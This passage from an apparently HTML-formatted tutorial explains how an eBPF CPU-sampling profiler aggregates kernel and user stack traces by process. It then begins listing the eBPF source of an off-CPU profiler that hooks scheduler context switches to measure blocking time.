                            &lt;span class="n"&gt;BPF_F_USER_STACK&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="n"&gt;valp&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_map_lookup_or_try_init&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;counts&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;zero&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;valp&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="n"&gt;__sync_fetch_and_add&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;valp&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="n"&gt;LICENSE&lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt; &lt;span class="n"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"license"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s"&gt;"GPL"&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The program starts by defining several BPF maps. The &lt;code&gt;stackmap&lt;/code&gt; is a special map type (&lt;code&gt;BPF_MAP_TYPE_STACK_TRACE&lt;/code&gt;) for storing stack traces. When you call &lt;code&gt;bpf_get_stackid()&lt;/code&gt;, the kernel walks the stack, stores the instruction pointers in this map, and returns an ID you can use to look the trace up later. Identical stacks get the same ID, which is what lets samples be aggregated by stack. The &lt;code&gt;counts&lt;/code&gt; map aggregates samples by a composite key that includes the process ID, the process name, and both stack IDs. The &lt;code&gt;pids&lt;/code&gt; and &lt;code&gt;tids&lt;/code&gt; maps act as filters, letting you restrict profiling to specific processes or threads.&lt;/p&gt;

&lt;p&gt;The main logic lives in the &lt;code&gt;do_perf_event()&lt;/code&gt; function, which runs every time a perf event fires. The user space program sets up these perf events at a specific frequency (default 49 Hz), one per CPU core. When the event fires on a CPU, this function runs in the context of whatever task is executing at that moment. It first splits the value returned by &lt;code&gt;bpf_get_current_pid_tgid()&lt;/code&gt; into the process ID (upper 32 bits) and the thread ID (lower 32 bits), skips the idle task unless &lt;code&gt;include_idle&lt;/code&gt; is set, and then applies any configured PID or TID filters. If the current thread should be sampled, it builds a key that holds the process ID, the process name, and the two stack IDs.&lt;/p&gt;

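&lt;p&gt;The two calls to &lt;code&gt;bpf_get_stackid()&lt;/code&gt; capture different parts of the execution context. The first call, with flags set to &lt;code&gt;0&lt;/code&gt;, captures the kernel stack, showing which kernel functions were active. The second call, with &lt;code&gt;BPF_F_USER_STACK&lt;/code&gt;, captures the user space stack, showing your application's function calls. When &lt;code&gt;user_stacks_only&lt;/code&gt; or &lt;code&gt;kernel_stacks_only&lt;/code&gt; is set, the stack that is not wanted is skipped and its ID is set to &lt;code&gt;-1&lt;/code&gt;. These stack IDs go into the key, and the program atomically increments the counter for that unique combination, creating it at zero the first time the key is seen. Over time, hot code paths get sampled more often and build up higher counts.&lt;/p&gt;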
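
&lt;p&gt;Because each sample stands for roughly one sampling period of CPU time, a count can be turned into an estimated duration. The following is a minimal sketch of that arithmetic and is not part of the profiler's code. The helper name &lt;code&gt;samples_to_ms()&lt;/code&gt; is hypothetical, and the result is a statistical estimate, not an exact measurement.&lt;/p&gt;

```c
/* Hypothetical helper, not part of the profiler: estimate the on-CPU time
 * in milliseconds for a stack that was sampled `count` times at `freq_hz`
 * samples per second on each CPU. */
unsigned long long samples_to_ms(unsigned long long count, unsigned int freq_hz)
{
    if (freq_hz == 0)
        return 0; /* no sampling rate, nothing to estimate */
    return count * 1000ULL / freq_hz;
}
```

&lt;p&gt;At the default 49 Hz, a stack that was sampled 98 times corresponds to about two seconds of CPU time under this estimate.&lt;/p&gt;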

&lt;h3&gt;
  
  
  Off-CPU Profiling with offcputime
&lt;/h3&gt;

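&lt;p&gt;The off-CPU profiler hooks into the scheduler to measure blocking time. Here's the eBPF program. Note that this listing does not define the &lt;code&gt;tgids&lt;/code&gt; and &lt;code&gt;pids&lt;/code&gt; filter maps or the &lt;code&gt;get_task_state()&lt;/code&gt; helper that &lt;code&gt;allow_record()&lt;/code&gt; uses:&lt;/p&gt;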

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="c1"&gt;// SPDX-License-Identifier: GPL-2.0&lt;/span&gt;
&lt;span class="cp"&gt;#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;vmlinux.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;bpf/bpf_helpers.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;bpf/bpf_core_read.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;bpf/bpf_tracing.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;"offcputime.h"&lt;/span&gt;&lt;span class="cp"&gt;
&lt;/span&gt;
&lt;span class="cp"&gt;#define PF_KTHREAD      0x00200000
&lt;/span&gt;
&lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="k"&gt;volatile&lt;/span&gt; &lt;span class="n"&gt;bool&lt;/span&gt; &lt;span class="n"&gt;kernel_threads_only&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;false&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="k"&gt;volatile&lt;/span&gt; &lt;span class="n"&gt;bool&lt;/span&gt; &lt;span class="n"&gt;user_threads_only&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;false&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="k"&gt;volatile&lt;/span&gt; &lt;span class="n"&gt;__u64&lt;/span&gt; &lt;span class="n"&gt;max_block_ns&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="cm"&gt;/* wraps to the largest __u64 value: no upper limit by default */&lt;/span&gt;
&lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="k"&gt;volatile&lt;/span&gt; &lt;span class="n"&gt;__u64&lt;/span&gt; &lt;span class="n"&gt;min_block_ns&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="k"&gt;volatile&lt;/span&gt; &lt;span class="n"&gt;bool&lt;/span&gt; &lt;span class="n"&gt;filter_by_tgid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;false&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="k"&gt;volatile&lt;/span&gt; &lt;span class="n"&gt;bool&lt;/span&gt; &lt;span class="n"&gt;filter_by_pid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;false&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="k"&gt;volatile&lt;/span&gt; &lt;span class="kt"&gt;long&lt;/span&gt; &lt;span class="n"&gt;state&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="cm"&gt;/* -1 disables the task-state filter */&lt;/span&gt;

&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;internal_key&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;u64&lt;/span&gt; &lt;span class="n"&gt;start_ts&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;key_t&lt;/span&gt; &lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;};&lt;/span&gt;

&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;__uint&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;type&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;BPF_MAP_TYPE_HASH&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__type&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;u32&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__type&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;internal_key&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__uint&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;max_entries&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;MAX_ENTRIES&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="n"&gt;start&lt;/span&gt; &lt;span class="nf"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;".maps"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;__uint&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;type&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;BPF_MAP_TYPE_STACK_TRACE&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__uint&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key_size&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;u32&lt;/span&gt;&lt;span class="p"&gt;));&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="n"&gt;stackmap&lt;/span&gt; &lt;span class="nf"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;".maps"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;__uint&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;type&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;BPF_MAP_TYPE_HASH&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__type&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;key_t&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__type&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;val_t&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__uint&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;max_entries&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;MAX_ENTRIES&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="n"&gt;info&lt;/span&gt; &lt;span class="nf"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;".maps"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="n"&gt;bool&lt;/span&gt; &lt;span class="nf"&gt;allow_record&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;task_struct&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;t&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;u32&lt;/span&gt; &lt;span class="n"&gt;tgid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;BPF_CORE_READ&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;t&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;tgid&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;u32&lt;/span&gt; &lt;span class="n"&gt;pid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;BPF_CORE_READ&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;t&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;pid&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;filter_by_tgid&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;bpf_map_lookup_elem&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;tgids&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;tgid&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nb"&gt;false&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;filter_by_pid&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;bpf_map_lookup_elem&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;pids&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;pid&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nb"&gt;false&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;user_threads_only&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;BPF_CORE_READ&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;t&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;flags&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt; &lt;span class="n"&gt;PF_KTHREAD&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nb"&gt;false&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;kernel_threads_only&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;BPF_CORE_READ&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;t&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;flags&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt; &lt;span class="n"&gt;PF_KTHREAD&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nb"&gt;false&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;state&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="n"&gt;get_task_state&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;t&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="n"&gt;state&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nb"&gt;false&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nb"&gt;true&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;handle_sched_switch&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;bool&lt;/span&gt; &lt;span class="n"&gt;preempt&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;task_struct&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;prev&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;task_struct&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;next&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;internal_key&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;i_keyp&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;i_key&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;val_t&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;valp&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;val&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="n"&gt;s64&lt;/span&gt; &lt;span class="n"&gt;delta&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="n"&gt;u32&lt;/span&gt; &lt;span class="n"&gt;pid&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;allow_record&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;prev&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;pid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;BPF_CORE_READ&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;prev&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;pid&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
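        &lt;span class="cm"&gt;/* Idle threads have pid 0 on every CPU; use the CPU ID to tell them apart */&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;pid&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;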
            &lt;span class="n"&gt;pid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_get_smp_processor_id&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
        &lt;span class="n"&gt;i_key&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;pid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;pid&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="n"&gt;i_key&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;tgid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;BPF_CORE_READ&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;prev&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;tgid&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="n"&gt;i_key&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;start_ts&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_ktime_get_ns&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;

        &lt;span class="cm"&gt;/* Kernel threads have no user space stack to capture */&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;BPF_CORE_READ&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;prev&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;flags&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt; &lt;span class="n"&gt;PF_KTHREAD&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="n"&gt;i_key&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;user_stack_id&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="k"&gt;else&lt;/span&gt;
            &lt;span class="n"&gt;i_key&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;user_stack_id&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_get_stackid&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;stackmap&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;BPF_F_USER_STACK&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="n"&gt;i_key&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;kern_stack_id&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_get_stackid&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;stackmap&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="n"&gt;bpf_map_update_elem&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;start&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;pid&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;i_key&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="n"&gt;bpf_probe_read_kernel_str&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;val&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;comm&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;prev&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;comm&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; &lt;span class="n"&gt;BPF_CORE_READ&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;prev&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;comm&lt;/span&gt;&lt;span class="p"&gt;));&lt;/span&gt;
        &lt;span class="n"&gt;val&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;delta&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
